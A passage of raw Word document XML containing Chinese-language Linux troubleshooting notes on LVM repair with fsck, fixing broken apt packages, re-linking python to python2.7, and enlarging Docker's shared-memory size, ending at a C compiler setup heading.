        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有对该磁盘进行挂载，而是使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行修复，所以你会发现能用的命令都很少，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有挂载磁盘，你无法执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下命令。可以看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>到目前你执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>initramfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），是类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样的内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而非磁盘。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB43FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199C66A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为我这里涉及到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的修复，故参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/xiangsikai/p/10684828.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201AE66B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，然后执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvdisplay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lv Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430650DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="292E898F" wp14:editId="796004FE">
            <wp:extent cx="3503295" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3503295" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64591EC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fsck /dev/ubuntu-vg/ubuntu-lv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD9E3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一路</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC78FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="73AC8080" wp14:editId="3BCAB4FF">
            <wp:extent cx="3605530" cy="2368550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3605530" cy="2368550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA0175" w14:textId="35896C28" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74070BE7" w14:textId="60551247" w:rsidR="00283310" w:rsidRDefault="00283310" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc159779739"/>
      <w:r w:rsidRPr="00283310">
        <w:t>apt-get --fix-broken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给出错误</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w14:paraId="0A39F0E6" w14:textId="06C2EF78" w:rsidR="00283310" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般就是安装包破损了，重新安装即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F698D61" w14:textId="0F61CAB0" w:rsidR="000C332F" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A96C93" w14:textId="31FFAADD" w:rsidR="000C332F" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AB3D5" w14:textId="54CD90EC" w:rsidR="000C332F" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C332F">
        <w:t>https://unix.stackexchange.com/questions/645445/apt-get-fix-broken-install-giving-a-error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF9130" w14:textId="4F9752EE" w:rsidR="000C332F" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B555783" w14:textId="6F7F42F9" w:rsidR="002B1347" w:rsidRDefault="002B1347" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7277D4" w14:textId="303AE80E" w:rsidR="000C332F" w:rsidRDefault="000C332F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000C332F">
        <w:t>sudo apt --fix-broken install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE7AED4" w14:textId="7E8CE1CE" w:rsidR="00CF1E0C" w:rsidRDefault="00CF54EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重启，就解决破损包的问题了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23073534" w14:textId="77777777" w:rsidR="00CF54EE" w:rsidRDefault="00CF54EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5798C03F" w14:textId="420F7AD5" w:rsidR="00CF1E0C" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="_Toc159779740"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ython</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软连接，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>y2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ython</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w14:paraId="269AFB46" w14:textId="773A113E" w:rsidR="000E3275" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C8302" w14:textId="3EE0CBF4" w:rsidR="00CF1E0C" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3275">
        <w:t>which python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD35FE" w14:textId="1191A987" w:rsidR="000E3275" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果不带版本数字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ytho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不对，就删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E719CDD" w14:textId="1C2161D5" w:rsidR="00CF1E0C" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3275">
        <w:t>sudo rm /usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2EE49" w14:textId="7903AEB5" w:rsidR="000E3275" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D524E04" w14:textId="703E206C" w:rsidR="000E3275" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后创建软连接即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A29BEC" w14:textId="517B0F38" w:rsidR="000E3275" w:rsidRDefault="000E3275" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3275">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3275">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ln -s /usr/bin/python2.7 /usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38D72C" w14:textId="5DC7731D" w:rsidR="00CF1E0C" w:rsidRDefault="00CF1E0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4797F69A" w14:textId="2BDC4E55" w:rsidR="00233F37" w:rsidRDefault="00233F37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB5EB4B" w14:textId="071082FA" w:rsidR="00233F37" w:rsidRDefault="00233F37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7D656C" w14:textId="5AE89939" w:rsidR="00233F37" w:rsidRDefault="005B1FED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc159779741"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>itlab-ee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的破解版返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="210CC78E" w14:textId="77777777" w:rsidR="00303C6E" w:rsidRDefault="00303C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61904C73" w14:textId="77777777" w:rsidR="00303C6E" w:rsidRDefault="00303C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46215A56" w14:textId="65936093" w:rsidR="00303C6E" w:rsidRDefault="00835DF6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥参考过的链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9ACFFE" w14:textId="77777777" w:rsidR="00303C6E" w:rsidRDefault="00303C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB06A7B" w14:textId="2AEFD92D" w:rsidR="005B1FED" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:anchor="devshm-mount-not-having-enough-space-in-docker-container" w:history="1">
        <w:r w:rsidRPr="00627070">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://docs.gitlab.com/ee/install/docker.html#devshm-mount-not-having-enough-space-in-docker-container</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="471576ED" w14:textId="4E6B531C" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0660491E" w14:textId="3CA9214E" w:rsidR="00307EFB" w:rsidRDefault="00D9342F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9342F">
        <w:t>https://blog.kelu.org/tech/2021/12/16/docker-shm.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E66D6FA" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRPr="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111EBD6F" w14:textId="4FF50E2D" w:rsidR="005B1FED" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidRPr="00627070">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_43545410/article/details/120963125</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FBFEFC1" w14:textId="0C15CE71" w:rsidR="00307EFB" w:rsidRPr="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：容器启动前修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA6347" w14:textId="3B9D7F1F" w:rsidR="00233F37" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00307EFB">
        <w:t>docker run -it --shm-size="1g" --name 001 busybox:latest /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24229956" w14:textId="0AB99F53" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：容器启动后修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012503E" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.docker ps | grep containerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D5EA0" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543DC97" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[root@linfs-bigdata containers]# docker inspect 641ae8c59c0d | grep Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47727D19" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "Id": "641ae8c59c0d20814d489cdc17a32f6ab3f35e621e5f67c2e0df1cc1b7efa269",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3605D2" w14:textId="77777777" w:rsidR="00307EFB" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ShmSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，单位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> kb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认大小为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，修改完后重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就生效了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCAF09" w14:textId="498A05AE" w:rsidR="005B1FED" w:rsidRDefault="00307EFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>vim /var/lib/docker/containers/641ae8c59c0d20814d489cdc17a32f6ab3f35e621e5f67c2e0df1cc1b7efa269/hostconfig.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242D610" w14:textId="591ADD5B" w:rsidR="00233F37" w:rsidRDefault="00233F37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0D27D3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0650A2D6" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4FFC14" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70866028" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23D703" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA8461C" w14:textId="16478AAA" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D774D22" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875"/>
    <w:p w14:paraId="5A680066" w14:textId="77777777" w:rsidR="0095219D" w:rsidRDefault="00C8665B" w:rsidP="0095219D">
      <w:r>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
